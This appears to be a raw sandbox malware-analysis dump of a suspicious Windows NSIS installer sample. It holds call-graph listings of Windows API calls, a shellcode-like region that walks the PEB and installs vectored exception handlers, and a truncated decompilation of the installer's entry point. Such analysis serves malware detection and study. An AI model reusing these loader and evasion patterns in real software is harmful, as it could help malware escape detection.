7320233f 6159->6155 6160->6151 6161->6151 6228 7320162f GlobalSize GlobalAlloc 6161->6228 6162->6155 6164->6148 6165 7320212f 6165->6092 6168 73202498 6166->6168 6167 732012cc GlobalAlloc lstrcpynW 6167->6168 6168->6167 6170 732025c1 GlobalFree 6168->6170 6171 73202540 GlobalAlloc WideCharToMultiByte 6168->6171 6172 7320256b GlobalAlloc 6168->6172 6174 73202582 6168->6174 6237 7320135a 6168->6237 6170->6168 6173 7320186f 6170->6173 6171->6170 6172->6174 6173->6100 6173->6101 6173->6102 6174->6170 6241 732027a4 6174->6241 6178 73202baa 6176->6178 6177 73202c4f FindCloseChangeNotification 6181 73202c6d 6177->6181 6178->6177 6180 73202d39 6180->6100 6244 73202b42 6181->6244 6183 73202453 6182->6183 6184 7320245e GlobalAlloc 6183->6184 6185 73201868 6183->6185 6184->6183 6185->6095 6190 73202840 6186->6190 6187 732028db GlobalAlloc 6191 732028fe 6187->6191 6188 732028ee 6189 732028f4 GlobalSize 6188->6189 6188->6191 6189->6191 6190->6187 6190->6188 6191->6120 6194 73202e2e 6192->6194 6193 73202e6e GlobalFree 6194->6193 6248 732012bb GlobalAlloc 6195->6248 6197 732026d8 MultiByteToWideChar 6201 7320265f 6197->6201 6198 7320270b lstrcpynW 6198->6201 6199 7320271e wsprintfW 6199->6201 6200 73202742 GlobalFree 6200->6201 6201->6197 6201->6198 6201->6199 6201->6200 6202 73202777 GlobalFree 6201->6202 6203 73201312 2 API calls 6201->6203 6249 73201381 6201->6249 6202->6109 6203->6201 6253 732012bb GlobalAlloc 6205->6253 6207 73201659 6208 73201666 2 API calls 6207->6208 6209 73201663 6208->6209 6210 73201312 6209->6210 6211 73201355 GlobalFree 6210->6211 6212 7320131b GlobalAlloc lstrcpynW 6210->6212 6211->6118 6212->6211 6214 73201672 wsprintfW 6213->6214 6215 7320169f lstrcpyW 6213->6215 6218 732016b8 6214->6218 6215->6218 6218->6121 6220 73201931 6219->6220 6221 73202626 6219->6221 6220->6128 6220->6129 6221->6220 6222 73202642 GlobalFree 6221->6222 6222->6221 6224 73201312 2 API calls 6223->6224 6225 732015fe 6224->6225 6225->6122 6226->6134 6227->6151 6229 7320164d 6228->6229 6229->6161 6236 732012bb GlobalAlloc 6230->6236 6232 732012db lstrcpynW 6232->6155 6233->6165 6234->6156 6235->6159 6236->6232 6238 73201361 6237->6238 6239 732012cc 2 API calls 6238->6239 6240 7320137f 6239->6240 6240->6168 6242 732027b2 VirtualAlloc 6241->6242 6243 73202808 6241->6243 6242->6243 6243->6174 6245 73202b4d 6244->6245 6246 73202b52 GetLastError 6245->6246 6247 73202b5d 6245->6247 6246->6247 6247->6180 6248->6201 6250 7320138a 6249->6250 6251 732013ac 6249->6251 6250->6251 6252 73201390 lstrcpyW 6250->6252 6251->6201 6252->6251 6253->6207 6844 2a51638 6847 2a51578 6844->6847 6845 2a56a18 GetPEB 6846 2a51637 6845->6846 6847->6844 6847->6845 6356 401ede 6364 402d84 6356->6364 6358 401ee4 6359 402d84 17 API calls 6358->6359 6360 401ef0 6359->6360 6361 401f07 EnableWindow 6360->6361 6362 401efc ShowWindow 6360->6362 6363 402c2a 6361->6363 6362->6363 6365 40657a 17 API calls 6364->6365 6366 402d99 6365->6366 6366->6358 6367 4056de 6368 405888 6367->6368 6369 4056ff GetDlgItem GetDlgItem GetDlgItem 6367->6369 6371 405891 GetDlgItem CreateThread FindCloseChangeNotification 6368->6371 6373 4058b9 6368->6373 6413 4044ce SendMessageW 6369->6413 6371->6373 6416 405672 5 API calls 6371->6416 6372 4058e4 6377 4058f0 6372->6377 6378 405944 6372->6378 6373->6372 6375 4058d0 ShowWindow ShowWindow 6373->6375 6376 405909 6373->6376 6374 40576f 6380 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 6374->6380 6415 4044ce SendMessageW 6375->6415 6379 404500 8 API calls 6376->6379 6382 4058f8 6377->6382 6383 40591e ShowWindow 6377->6383 6378->6376 6389 405952 SendMessageW 6378->6389 6384 405917 6379->6384 6387 4057e4 6380->6387 6388 4057c8 SendMessageW SendMessageW 6380->6388 6390 404472 SendMessageW 6382->6390 6385 405930 6383->6385 6386 40593e 6383->6386 6391 40559f 24 API calls 6385->6391 6392 404472 SendMessageW 6386->6392 6393 4057f7 6387->6393 6394 4057e9 SendMessageW 6387->6394 6388->6387 6389->6384 6395 40596b CreatePopupMenu 6389->6395 6390->6376 6391->6386 6392->6378 6397 404499 18 API calls 6393->6397 6394->6393 6396 40657a 17 API calls 6395->6396 6398 40597b AppendMenuW 6396->6398 6399 405807 6397->6399 6400 405998 GetWindowRect 6398->6400 6401 4059ab TrackPopupMenu 6398->6401 6402 405810 ShowWindow 6399->6402 6403 405844 GetDlgItem SendMessageW 6399->6403 6400->6401 6401->6384 6404 4059c6 6401->6404 6405 405833 6402->6405 6406 405826 ShowWindow 6402->6406 6403->6384 6407 40586b SendMessageW SendMessageW 6403->6407 6408 4059e2 SendMessageW 6404->6408 6414 4044ce SendMessageW 6405->6414 6406->6405 6407->6384 6408->6408 6409 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 6408->6409 6411 405a24 SendMessageW 6409->6411 6411->6411 6412 405a4d GlobalUnlock SetClipboardData CloseClipboard 6411->6412 6412->6384 6413->6374 6414->6403 6415->6372 6848 4028de 6849 4028e6 6848->6849 6850 4028ea FindNextFileW 6849->6850 6853 4028fc 6849->6853 6851 402943 6850->6851 6850->6853 6854 40653d lstrcpynW 6851->6854 6854->6853 6855 404ce0 6856 404cf0 6855->6856 6857 404d0c 6855->6857 6866 405b81 GetDlgItemTextW 6856->6866 6859 404d12 SHGetPathFromIDListW 6857->6859 6860 404d3f 6857->6860 6862 404d29 SendMessageW 6859->6862 6863 404d22 6859->6863 6861 404cfd SendMessageW 6861->6857 6862->6860 6865 40140b 2 API calls 6863->6865 6865->6862 6866->6861 6868 2a56006 6869 2a56034 6868->6869 6870 2a55694 2 API calls 6868->6870 6871 2a56a18 GetPEB 6869->6871 6870->6869 6872 2a56042 6871->6872 6873 2a56a18 GetPEB 6872->6873 6874 2a56055 6873->6874 5702 2a50000 5703 2a50061 5702->5703 5708 2a50002 5703->5708 5705 2a5018f 5706 2a50066 5706->5705 5714 2a56cd9 GetPEB 5706->5714 5709 2a50008 5708->5709 5710 2a50002 GetPEB 5709->5710 5711 2a50066 5710->5711 5712 2a56cd9 GetPEB 5711->5712 5713 2a5018f 5711->5713 5712->5713 5713->5706 5715 2a56cee 5714->5715 5715->5705 6878 402aeb 6879 402d84 17 API calls 6878->6879 6880 402af1 6879->6880 6881 40657a 17 API calls 6880->6881 6882 40292e 6880->6882 6881->6882 7409 2a5590e 7410 2a564d8 7409->7410 7411 2a5591c 2 API calls 7410->7411 7412 2a564dd 7411->7412 7413 2a55005 2 API calls 7412->7413 7414 2a564f8 7413->7414 7415 2a54f5d 2 API calls 7414->7415 7416 2a56517 7415->7416 7417 2a54fb6 2 API calls 7416->7417 7418 2a56534 7417->7418 6883 4026ec 6884 402d84 17 API calls 6883->6884 6891 4026fb 6884->6891 6885 402838 6886 402745 ReadFile 6886->6885 6886->6891 6887 4060b0 ReadFile 6887->6891 6888 402785 MultiByteToWideChar 6888->6891 6889 40283a 6896 406484 wsprintfW 6889->6896 6890 40610e 5 API calls 6890->6891 6891->6885 6891->6886 6891->6887 6891->6888 6891->6889 6891->6890 6893 4027ab SetFilePointer MultiByteToWideChar 6891->6893 6895 40284b 6891->6895 6893->6891 6894 40286c SetFilePointer 6894->6885 6895->6885 6895->6894 6896->6885 7419 4023f4 7420 402da6 17 API calls 7419->7420 7421 402403 7420->7421 7422 402da6 17 API calls 7421->7422 7423 40240c 7422->7423 7424 402da6 17 API calls 7423->7424 7425 402416 GetPrivateProfileStringW 7424->7425 6897 4014f5 SetForegroundWindow 6898 402c2a 6897->6898 7426 401ff6 7427 402da6 17 API calls 7426->7427 7428 401ffd 7427->7428 7429 406873 2 API calls 7428->7429 7430 402003 7429->7430 7432 402014 7430->7432 7433 406484 wsprintfW 7430->7433 7433->7432 6899 4022ff 6900 402da6 17 API calls 6899->6900 6901 402305 6900->6901 6902 402da6 17 API calls 6901->6902 6903 40230e 6902->6903 6904 402da6 17 API calls 6903->6904 6905 402317 6904->6905 6906 406873 2 API calls 6905->6906 6907 402320 6906->6907 6908 402331 lstrlenW lstrlenW 6907->6908 6909 402324 6907->6909 6911 40559f 24 API calls 6908->6911 6910 40559f 24 API calls 6909->6910 6913 40232c 6909->6913 6910->6913 6912 40236f SHFileOperationW 6911->6912 6912->6909 6912->6913 7444 4019ff 7445 402da6 17 API calls 7444->7445 7446 401a06 7445->7446 7447 402da6 17 API calls 7446->7447 7448 401a0f 7447->7448 7449 401a16 lstrcmpiW 7448->7449 7450 401a28 lstrcmpW 7448->7450 7451 401a1c 7449->7451 7450->7451 7452 401d81 7453 401d94 GetDlgItem 7452->7453 7454 401d87 7452->7454 7457 401d8e 7453->7457 7455 402d84 17 API calls 7454->7455 7455->7457 7456 401dd5 GetClientRect LoadImageW SendMessageW 7460 401e33 7456->7460 7462 401e3f 7456->7462 7457->7456 7459 402da6 17 API calls 7457->7459 7459->7456 7461 401e38 DeleteObject 7460->7461 7460->7462 7461->7462 7463 732010e1 7464 73201111 7463->7464 7465 732012b0 GlobalFree 7464->7465 7466 732011d7 GlobalAlloc 7464->7466 7467 73201240 GlobalFree 7464->7467 7468 732012ab 7464->7468 7469 7320135a 2 API calls 7464->7469 7470 73201312 2 API calls 7464->7470 7471 7320129a GlobalFree 7464->7471 7472 7320116b GlobalAlloc 7464->7472 7473 73201381 lstrcpyW 7464->7473 7466->7464 7467->7464 7468->7465 7469->7464 7470->7464 7471->7464 7472->7464 7473->7464 7474 402383 7475 40238a 7474->7475 7478 40239d 7474->7478 7476 40657a 17 API calls 7475->7476 7477 402397 7476->7477 7477->7478 7479 405b9d MessageBoxIndirectW 7477->7479 7479->7478 6914 732023e9 6915 73202453 6914->6915 6916 7320245e GlobalAlloc 6915->6916 6917 7320247d 6915->6917 6916->6915 6918 40248a 6919 402da6 17 API calls 6918->6919 6920 40249c 6919->6920 6921 402da6 17 API calls 6920->6921 6922 4024a6 6921->6922 6935 402e36 6922->6935 6925 4024de 6927 4024ea 6925->6927 6929 402d84 17 API calls 6925->6929 6926 402c2a 6930 402509 RegSetValueExW 6927->6930 6932 4032b4 31 API calls 6927->6932 6928 402da6 17 API calls 6931 4024d4 lstrlenW 6928->6931 6929->6927 6933 40251f RegCloseKey 6930->6933 6931->6925 6932->6930 6933->6926 6936 402e51 6935->6936 6939 4063d8 6936->6939 6940 4063e7 6939->6940 6941 4063f2 RegCreateKeyExW 6940->6941 6942 4024b6 6940->6942 6941->6942 6942->6925 6942->6926 6942->6928 7480 40498a 7481 4049b6 7480->7481 7482 4049c7 7480->7482 7541 405b81 GetDlgItemTextW 7481->7541 7484 4049d3 GetDlgItem 7482->7484 7485 404a32 7482->7485 7488 4049e7 7484->7488 7486 404b16 7485->7486 7495 40657a 17 API calls 7485->7495 7539 404cc5 7485->7539 7486->7539 7543 405b81 GetDlgItemTextW 7486->7543 7487 4049c1 7489 4067c4 5 API calls 7487->7489 7490 4049fb SetWindowTextW 7488->7490 7493 405eb7 4 API calls 7488->7493 7489->7482 7494 404499 18 API calls 7490->7494 7492 404500 8 API calls 7497 404cd9 7492->7497 7498 4049f1 7493->7498 7499 404a17 7494->7499 7500 404aa6 SHBrowseForFolderW 7495->7500 7496 404b46 7501 405f14 18 API calls 7496->7501 7498->7490 7505 405e0c 3 API calls 7498->7505 7502 404499 18 API calls 7499->7502 7500->7486 7503 404abe CoTaskMemFree 7500->7503 7504 404b4c 7501->7504 7506 404a25 7502->7506 7507 405e0c 3 API calls 7503->7507 7544 40653d lstrcpynW 7504->7544 7505->7490 7542 4044ce SendMessageW 7506->7542 7512 404acb 7507->7512 7510 404a2b 7514 40690a 5 API calls 7510->7514 7511 404b02 SetDlgItemTextW 7511->7486 7512->7511 7516 40657a 17 API calls 7512->7516 7513 404b63 7515 40690a 5 API calls 7513->7515 7514->7485 7522 404b6a 7515->7522 7518 404aea lstrcmpiW 7516->7518 7517 404bab 7545 40653d lstrcpynW 7517->7545 7518->7511 7519 404afb lstrcatW 7518->7519 7519->7511 7521 404bb2 7523 405eb7 4 API calls 7521->7523 7522->7517 7527 405e58 2 API calls 7522->7527 7528 404c03 7522->7528 7524 404bb8 GetDiskFreeSpaceW 7523->7524 7526 404bdc MulDiv 7524->7526 7524->7528 7526->7528 7527->7522 7529 404c74 7528->7529 7531 404e0f 20 API calls 7528->7531 7530 404c97 7529->7530 7532 40140b 2 API calls 7529->7532 7546 4044bb KiUserCallbackDispatcher 7530->7546 7533 404c61 7531->7533 7532->7530 7535 404c76 SetDlgItemTextW 7533->7535 7536 404c66 7533->7536 7535->7529 7538 404d46 20 API calls 7536->7538 7537 404cb3 7537->7539 7540 4048e3 SendMessageW 7537->7540 7538->7529 7539->7492 7540->7539 7541->7487 7542->7510 7543->7496 7544->7513 7545->7521 7546->7537 6943 401491 6944 40559f 24 API calls 6943->6944 6945 401498 6944->6945 6946 402891 6947 402898 6946->6947 6950 402ba9 6946->6950 6948 402d84 17 API calls 6947->6948 6949 40289f 6948->6949 6951 4028ae SetFilePointer 6949->6951 6951->6950 6952 4028be 6951->6952 6954 406484 wsprintfW 6952->6954 6954->6950 7550 402f93 7551 402fa5 SetTimer 7550->7551 7552 402fbe 7550->7552 7551->7552 7553 403013 7552->7553 7554 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 7552->7554 7554->7553 7555 2a54d70 7556 2a55694 2 API calls 7555->7556 7557 2a54d91 7555->7557 7556->7557 6254 403f9a 6255 403fb2 6254->6255 6256 404113 6254->6256 6255->6256 6257 403fbe 6255->6257 6258 404124 GetDlgItem GetDlgItem 6256->6258 6263 404164 6256->6263 6259 403fc9 SetWindowPos 6257->6259 6260 403fdc 6257->6260 6327 404499 6258->6327 6259->6260 6266 403fe5 ShowWindow 6260->6266 6267 404027 6260->6267 6262 40414e KiUserCallbackDispatcher 6268 40140b 2 API calls 6262->6268 6264 4041be 6263->6264 6271 401389 2 API calls 6263->6271 6265 4044e5 SendMessageW 6264->6265 6272 40410e 6264->6272 6294 4041d0 6265->6294 6273 404100 6266->6273 6274 404005 GetWindowLongW 6266->6274 6269 404046 6267->6269 6270 40402f DestroyWindow 6267->6270 6268->6263 6276 40404b SetWindowLongW 6269->6276 6277 40405c 6269->6277 6275 404422 6270->6275 6278 404196 6271->6278 6336 404500 6273->6336 6274->6273 6280 40401e ShowWindow 6274->6280 6275->6272 6285 404453 ShowWindow 6275->6285 6276->6272 6277->6273 6282 404068 GetDlgItem 6277->6282 6278->6264 6283 40419a SendMessageW 6278->6283 6280->6267 6281 404424 DestroyWindow EndDialog 6281->6275 6286 404096 6282->6286 6287 404079 SendMessageW IsWindowEnabled 6282->6287 6283->6272 6284 40140b 2 API calls 6284->6294 6285->6272 6289 4040a3 6286->6289 6291 4040ea SendMessageW 6286->6291 6292 4040b6 6286->6292 6300 40409b 6286->6300 6287->6272 6287->6286 6288 40657a 17 API calls 6288->6294 6289->6291 6289->6300 6291->6273 6295 4040d3 6292->6295 6296 4040be 6292->6296 6293 4040d1 6293->6273 6294->6272 6294->6281 6294->6284 6294->6288 6297 404499 18 API calls 6294->6297 6302 404499 18 API calls 6294->6302 6318 404364 DestroyWindow 6294->6318 6298 40140b 2 API calls 6295->6298 6299 40140b 2 API calls 6296->6299 6297->6294 6301 4040da 6298->6301 6299->6300 6333 404472 6300->6333 6301->6273 6301->6300 6303 40424b GetDlgItem 6302->6303 6304 404260 6303->6304 6305 404268 ShowWindow KiUserCallbackDispatcher 6303->6305 6304->6305 6330 4044bb KiUserCallbackDispatcher 6305->6330 6307 404292 EnableWindow 6312 4042a6 6307->6312 6308 4042ab GetSystemMenu EnableMenuItem SendMessageW 6309 4042db SendMessageW 6308->6309 6308->6312 6309->6312 6311 403f7b 18 API calls 6311->6312 6312->6308 6312->6311 6331 4044ce SendMessageW 6312->6331 6332 40653d lstrcpynW 6312->6332 6314 40430a lstrlenW 6315 40657a 17 API calls 6314->6315 6316 404320 SetWindowTextW 6315->6316 6317 401389 2 API calls 6316->6317 6317->6294 6318->6275 6319 40437e CreateDialogParamW 6318->6319 6319->6275 6320 4043b1 6319->6320 6321 404499 18 API calls 6320->6321 6322 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 6321->6322 6323 401389 2 API calls 6322->6323 6324 404402 6323->6324 6324->6272 6325 40440a ShowWindow 6324->6325 6326 4044e5 SendMessageW 6325->6326 6326->6275 6328 40657a 17 API calls 6327->6328 6329 4044a4 SetDlgItemTextW 6328->6329 6329->6262 6330->6307 6331->6312 6332->6314 6334 404479 6333->6334 6335 40447f SendMessageW 6333->6335 6334->6335 6335->6293 6337 404518 GetWindowLongW 6336->6337 6338 4045c3 6336->6338 6337->6338 6339 40452d 6337->6339 6338->6272 6339->6338 6340 40455a GetSysColor 6339->6340 6341 40455d 6339->6341 6340->6341 6342 404563 SetTextColor 6341->6342 6343 40456d SetBkMode 6341->6343 6342->6343 6344 404585 GetSysColor 6343->6344 6345 40458b 6343->6345 6344->6345 6346 404592 SetBkColor 6345->6346 6347 40459c 6345->6347 6346->6347 6347->6338 6348 4045b6 CreateBrushIndirect 6347->6348 6349 4045af DeleteObject 6347->6349 6348->6338 6349->6348 7558 401b9b 7559 401bec 7558->7559 7560 401ba8 7558->7560 7562 401bf1 7559->7562 7563 401c16 GlobalAlloc 7559->7563 7561 401c31 7560->7561 7566 401bbf 7560->7566 7565 40657a 17 API calls 7561->7565 7572 40239d 7561->7572 7562->7572 7579 40653d lstrcpynW 7562->7579 7564 40657a 17 API calls 7563->7564 7564->7561 7567 402397 7565->7567 7577 40653d lstrcpynW 7566->7577 7567->7572 7573 405b9d MessageBoxIndirectW 7567->7573 7569 401c03 GlobalFree 7569->7572 7571 401bce 7578 40653d lstrcpynW 7571->7578 7573->7572 7575 401bdd 7580 40653d lstrcpynW 7575->7580 7577->7571 7578->7575 7579->7569 7580->7572 6955 40149e 6956 4014ac PostQuitMessage 6955->6956 6957 40239d 6955->6957 6956->6957 6958 2a5187b 6959 2a55056 6958->6959 6960 2a5812b RtlAddVectoredExceptionHandler 6959->6960 6961 2a550a5 6960->6961 7581 2a5237b 7582 2a55694 2 API calls 7581->7582 7583 2a52386 7582->7583 7584 2a523bf 7583->7584 7585 2a55694 2 API calls 7583->7585 7585->7584 7586 40259e 7587 402de6 17 API calls 7586->7587 7588 4025a8 7587->7588 7589 402d84 17 API calls 7588->7589 7590 4025b1 7589->7590 7591 4025d9 RegEnumValueW 7590->7591 7592 4025cd RegEnumKeyW 7590->7592 7594 40292e 7590->7594 7593 4025ee RegCloseKey 7591->7593 7592->7593 7593->7594 7596 4015a3 7597 402da6 17 API calls 7596->7597 7598 4015aa SetFileAttributesW 7597->7598 7599 4015bc 7598->7599 7600 401fa4 7601 402da6 17 API calls 7600->7601 7602 401faa 7601->7602 7603 40559f 24 API calls 7602->7603 7604 401fb4 7603->7604 7605 405b20 2 API calls 7604->7605 7606 401fba 7605->7606 7607 401fdd CloseHandle 7606->7607 7609 4069b5 5 API calls 7606->7609 7611 40292e 7606->7611 7607->7611 7610 401fcf 7609->7610 7610->7607 7613 406484 wsprintfW 7610->7613 7613->7607 7614 4021aa 7615 402da6 17 API calls 7614->7615 7616 4021b1 7615->7616 7617 402da6 17 API calls 7616->7617 7618 4021bb 7617->7618 7619 402da6 17 API calls 7618->7619 7620 4021c5 7619->7620 7621 402da6 17 API calls 7620->7621 7622 4021cf 7621->7622 7623 402da6 17 API calls 7622->7623 7624 4021d9 7623->7624 7625 402218 CoCreateInstance 7624->7625 7626 402da6 17 API calls 7624->7626 7628 402237 7625->7628 7626->7625 7627 401423 24 API calls 7629 4022f6 7627->7629 7628->7627 7628->7629 7630 403baa 7631 403bb5 7630->7631 7632 403bbc GlobalAlloc 7631->7632 7633 403bb9 7631->7633 7632->7633 6962 2a5824e 6963 2a58254 6962->6963 6968 2a50234 6963->6968 6966 2a56cd9 GetPEB 6967 2a56a96 6966->6967 6969 2a5812b RtlAddVectoredExceptionHandler 6968->6969 6970 2a50251 6969->6970 6970->6966 6970->6967 7634 2a52749 7635 2a5276a 7634->7635 7636 2a5812b RtlAddVectoredExceptionHandler 7635->7636 7638 2a528da 7635->7638 7637 2a5289a 7636->7637 7639 4023b2 7640 4023c0 7639->7640 7641 4023ba 7639->7641 7643 402da6 17 API calls 7640->7643 7644 4023ce 7640->7644 7642 402da6 17 API calls 7641->7642 7642->7640 7643->7644 7645 402da6 17 API calls 7644->7645 7647 4023dc 7644->7647 7645->7647 7646 402da6 17 API calls 7648 4023e5 WritePrivateProfileStringW 7646->7648 7647->7646 6980 4014b8 6981 4014be 6980->6981 6982 401389 2 API calls 6981->6982 6983 4014c6 6982->6983 6984 2a57658 6991 2a53ee9 6984->6991 6985 2a56a18 6986 2a56cd9 GetPEB 6985->6986 6987 2a56a96 6985->6987 6986->6987 6988 2a57564 4 API calls 6988->6991 6989 2a50903 6990 2a54bd0 2 API calls 6990->6991 6991->6985 6991->6988 6991->6989 6991->6990 6992 2a5812b RtlAddVectoredExceptionHandler 6991->6992 6993 2a54b2b 6991->6993 6995 2a5425b 6991->6995 6992->6991 6994 2a5812b RtlAddVectoredExceptionHandler 6993->6994 6996 2a54b3c 6994->6996 6997 2a54f3f 2 API calls 6995->6997 6998 2a5812b RtlAddVectoredExceptionHandler 6996->6998 7001 2a5427a 6997->7001 6999 2a54b4a 6998->6999 7000 2a5812b RtlAddVectoredExceptionHandler 6999->7000 7002 2a54b80 7000->7002 7001->6985 7003 2a5812b RtlAddVectoredExceptionHandler 7001->7003 7004 2a5812b RtlAddVectoredExceptionHandler 7002->7004 7005 2a54497 7003->7005 7006 2a54bb8 7004->7006 7005->6993 7007 2a5096b 7005->7007 7008 2a5812b RtlAddVectoredExceptionHandler 7005->7008 7009 2a545b5 7008->7009 7009->6993 7010 2a5812b RtlAddVectoredExceptionHandler 7009->7010 7011 2a54749 7010->7011 7011->6985 7011->6993 7012 2a549eb 7011->7012 7013 2a5812b RtlAddVectoredExceptionHandler 7012->7013 7014 2a54a2b 7013->7014 7014->6993 7015 2a5812b RtlAddVectoredExceptionHandler 7014->7015 7016 2a54a96 7015->7016 7016->6993 7017 2a54ac6 7016->7017 7018 2a5812b RtlAddVectoredExceptionHandler 7017->7018 7019 2a54afc 7018->7019 7020 2a5812b RtlAddVectoredExceptionHandler 7019->7020 7021 2a54b2a 7020->7021

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 11 403614 5->11 8 403620-403634 call 40689a lstrlenA 6->8 13 403636-403652 call 40690a * 3 8->13 11->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 38 403702-403706 35->38 39 4036fd-403701 35->39 36->35 36->36 47 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->47 48 40386a-403882 DeleteFileW call 40307d 37->48 41 4037c6-4037d4 call 405e39 38->41 42 40370c-403712 38->42 39->38 41->32 56 4037d6-4037d7 41->56 45 403714-40371b 42->45 46 40372c-403765 42->46 51 403722 45->51 52 40371d-403720 45->52 53 403781-4037bb 46->53 54 403767-40376c 46->54 47->48 66 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 47->66 62 403888-40388e 48->62 63 403a59-403a67 call 403b12 OleUninitialize 48->63 51->46 52->46 52->51 60 4037c3-4037c5 53->60 61 4037bd-4037c1 53->61 54->53 58 40376e-403776 54->58 56->32 64 403778-40377b 58->64 65 40377d 58->65 60->41 61->60 67 4037e6-4037f3 call 40653d 61->67 68 403894-4038a7 call 405e39 62->68 69 403935-40393c call 403bec 62->69 79 403a69-403a78 call 405b9d ExitProcess 63->79 80 403a7e-403a84 63->80 64->53 64->65 65->53 66->48 66->63 67->37 83 4038f9-403906 68->83 84 4038a9-4038de 68->84 78 403941-403944 69->78 78->63 81 403a86-403a9b GetCurrentProcess OpenProcessToken 80->81 82 403afc-403b04 80->82 86 403acc-403ada call 40690a 81->86 87 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 81->87 89 403b06 82->89 90 403b09-403b0c ExitProcess 82->90 91 403908-403916 call 405f14 83->91 92 403949-40395d call 405b08 lstrcatW 83->92 88 4038e0-4038e4 84->88 104 403ae8-403af3 ExitWindowsEx 86->104 105 403adc-403ae6 86->105 87->86 95 4038e6-4038eb 88->95 96 4038ed-4038f5 88->96 89->90 91->63 103 40391c-403932 call 40653d * 2 91->103 106 40396a-403984 lstrcatW lstrcmpiW 92->106 107 40395f-403965 lstrcatW 92->107 95->96 101 4038f7 95->101 96->88 96->101 101->83 103->69 104->82 109 403af5-403af7 call 40140b 104->109 105->104 105->109 110 403a57 106->110 111 40398a-40398d 106->111 107->106 109->82 110->63 115 403996 call 405aeb 111->115 116 40398f-403994 call 405a6e 111->116 121 40399b-4039ab SetCurrentDirectoryW 115->121 116->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 133 403a50-403a52 call 4062fd 131->133 132->131 134 403a18-403a38 call 4062fd call 40657a call 405b20 132->134 133->110 134->131 142 403a3a-403a41 CloseHandle 134->142 142->131
                                                  C-Code - Quality: 79%
                                                  			_entry_() {
                                                  				WCHAR* _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				signed int _v20;
                                                  				int _v24;
                                                  				int _v28;
                                                  				struct _TOKEN_PRIVILEGES _v40;
                                                  				signed char _v42;
                                                  				int _v44;
                                                  				signed int _v48;
                                                  				intOrPtr _v278;
                                                  				signed short _v310;
                                                  				struct _OSVERSIONINFOW _v324;
                                                  				struct _SHFILEINFOW _v1016;
                                                  				intOrPtr* _t88;
                                                  				WCHAR* _t92;
                                                  				char* _t94;
                                                  				void _t97;
                                                  				void* _t116;
                                                  				WCHAR* _t118;
                                                  				signed int _t120;
                                                  				intOrPtr* _t124;
                                                  				void* _t138;
                                                  				void* _t144;
                                                  				void* _t149;
                                                  				void* _t153;
                                                  				void* _t158;
                                                  				signed int _t168;
                                                  				void* _t171;
                                                  				void* _t176;
                                                  				intOrPtr _t178;
                                                  				intOrPtr _t179;
                                                  				intOrPtr* _t180;
                                                  				int _t189;
                                                  				void* _t190;
                                                  				void* _t199;
                                                  				signed int _t205;
                                                  				signed int _t210;
                                                  				signed int _t215;
                                                  				signed int _t217;
                                                  				int* _t219;
                                                  				signed int _t227;
                                                  				signed int _t230;
                                                  				CHAR* _t232;
                                                  				char* _t233;
                                                  				signed int _t234;
                                                  				WCHAR* _t235;
                                                  				void* _t251;
                                                  
                                                  				_t217 = 0x20;
                                                  				_t189 = 0;
                                                  				_v24 = 0;
                                                  				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                  				_v20 = 0;
                                                  				SetErrorMode(0x8001); // executed
                                                  				_v324.szCSDVersion = 0;
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				_v324.dwOSVersionInfoSize = 0x11c;
                                                  				if(GetVersionExW( &_v324) == 0) {
                                                  					_v324.dwOSVersionInfoSize = 0x114;
                                                  					GetVersionExW( &_v324);
                                                  					asm("sbb eax, eax");
                                                  					_v42 = 4;
                                                  					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                  				}
                                                  				if(_v324.dwMajorVersion < 0xa) {
                                                  					_v310 = _v310 & 0x00000000;
                                                  				}
                                                  				 *0x434fb8 = _v324.dwBuildNumber;
                                                  				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                  				if( *0x434fbe != 0x600) {
                                                  					_t180 = E0040690A(_t189);
                                                  					if(_t180 != _t189) {
                                                  						 *_t180(0xc00);
                                                  					}
                                                  				}
                                                  				_t232 = "UXTHEME";
                                                  				do {
                                                  					E0040689A(_t232); // executed
                                                  					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                  				} while ( *_t232 != 0);
                                                  				E0040690A(0xb);
                                                  				 *0x434f04 = E0040690A(9);
                                                  				_t88 = E0040690A(7);
                                                  				if(_t88 != _t189) {
                                                  					_t88 =  *_t88(0x1e);
                                                  					if(_t88 != 0) {
                                                  						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                  					}
                                                  				}
                                                  				__imp__#17();
                                                  				__imp__OleInitialize(_t189); // executed
                                                  				 *0x434fc0 = _t88;
                                                  				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                  				E0040653D(0x433f00, L"NSIS Error");
                                                  				_t92 = GetCommandLineW();
                                                  				_t233 = L"\"C:\\Users\\alfons\\Desktop\\9u4xTDR5bG.exe\" ";
